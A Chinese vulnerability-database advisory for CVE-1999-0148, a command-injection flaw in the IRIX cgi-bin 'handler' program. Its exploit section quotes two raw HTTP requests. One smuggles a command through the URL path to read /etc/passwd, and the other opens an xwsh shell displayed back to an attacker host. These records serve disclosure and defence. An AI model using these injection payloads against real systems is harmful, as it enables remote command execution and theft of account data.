IRIX cgi-bin处理程序漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105312 漏洞类型 输入验证
发布时间 1997-06-16 更新时间 2005-05-02
CVE编号 CVE-1999-0148 CNNVD-ID CNNVD-199709-004
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/19303
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199709-004
|漏洞详情
IRIX的处理程序CGI允许任意命令的执行。
|漏洞EXP
source: http://www.securityfocus.com/bid/380/info

A vulnerability exists in the cgi-bin program 'handler', as included by Silicon Graphics in their Irix operating system. This vulnerability will allow a remote attacker to execute arbitrary commands on the vulnerable host as the user the web server is running as. This can easily result in a user being able to access the system.

telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download HTTP/1.0

or:

telnet target.machine.com 80
GET /cgi-bin/handler/blah;/usr/sbin/xwsh -display yourhost.com|?data=Download

NOTE: large spaces are actually tabs.
|参考资料

来源:BID
名称:380
链接:http://www.securityfocus.com/bid/380
来源:SGI
名称:19970501-02-PX
链接:ftp://patches.sgi.com/support/free/security/advisories/19970501-02-PX